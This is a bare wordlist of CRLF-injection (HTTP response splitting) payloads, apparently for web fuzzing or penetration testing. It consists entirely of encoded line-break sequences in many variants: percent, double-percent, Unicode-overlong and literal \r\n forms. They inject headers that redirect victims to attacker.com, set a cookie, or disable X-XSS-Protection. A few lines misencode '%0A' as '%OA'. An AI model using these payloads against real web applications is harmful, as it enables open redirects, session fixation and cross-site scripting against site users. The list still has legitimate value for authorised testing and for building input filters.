%E5%98%8A%E5%98%8Dcontent-type%3Atext%2Fhtml%E5%98%8A%E5%98%8Dlocation%3A%E5%98%8A%E5%98%8D%E5%98%8A
%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a
%0D%0ASet-Cookie:mycookie=myvalue
%0ALocation:%20attacker.com
%0A%20Location:%20attacker.com
%20%0ALocation:%20attacker.com
%23%OALocation:%20attacker.com
%E5%98%8A%E5%98%8DLocation:%20attacker.com
%E5%98%8A%E5%98%8D%0ALocation:%20attacker.com
%3F%0ALocation:%20attacker.com
crlf%0ALocation:%20attacker.com
crlf%0A%20Location:%20attacker.com
crlf%20%0ALocation:%20attacker.com
crlf%23%OALocation:%20attacker.com
crlf%E5%98%8A%E5%98%8DLocation:%20attacker.com
crlf%E5%98%8A%E5%98%8D%0ALocation:%20attacker.com
crlf%3F%0ALocation:%20attacker.com
%0DLocation:%20attacker.com
%0D%20Location:%20attacker.com
%20%0DLocation:%20attacker.com
%23%0DLocation:%20attacker.com
%23%0ALocation:%20attacker.com
%E5%98%8A%E5%98%8DLocation:%20attacker.com
%E5%98%8A%E5%98%8D%0DLocation:%20attacker.com
%3F%0DLocation:%20attacker.com
crlf%0DLocation:%20attacker.com
crlf%0D%20Location:%20attacker.com
crlf%20%0DLocation:%20attacker.com
crlf%23%0DLocation:%20attacker.com
crlf%23%0ALocation:%20attacker.com
crlf%E5%98%8A%E5%98%8DLocation:%20attacker.com
crlf%E5%98%8A%E5%98%8D%0DLocation:%20attacker.com
crlf%3F%0DLocation:%20attacker.com
%0D%0ALocation:%20attacker.com
%0D%0A%20Location:%20attacker.com
%20%0D%0ALocation:%20attacker.com
%23%0D%0ALocation:%20attacker.com
\r\nLocation:%20attacker.com
%20\r\n%20Location:%20attacker.com
\r\n%20Location:%20attacker.com
%5cr%5cnLocation:%20attacker.com
%E5%98%8A%E5%98%8DLocation:%20attacker.com
%E5%98%8A%E5%98%8D%0D%0ALocation:%20attacker.com
%3F%0D%0ALocation:%20attacker.com
crlf%0D%0ALocation:%20attacker.com
crlf%0D%0A%20Location:%20attacker.com
crlf%20%0D%0ALocation:%20attacker.com
crlf%23%0D%0ALocation:%20attacker.com
crlf\r\nLocation:%20attacker.com
crlf%5cr%5cnLocation:%20attacker.com
crlf%E5%98%8A%E5%98%8DLocation:%20attacker.com
crlf%E5%98%8A%E5%98%8D%0D%0ALocation:%20attacker.com
crlf%3F%0D%0ALocation:%20attacker.com
%0D%0A%09Location:%20attacker.com
crlf%0D%0A%09Location:%20attacker.com
%250ALocation:%20attacker.com
%25250ALocation:%20attacker.com
%%0A0ALocation:%20attacker.com
%25%30ALocation:%20attacker.com
%25%30%61Location:%20attacker.com
%u000ALocation:%20attacker.com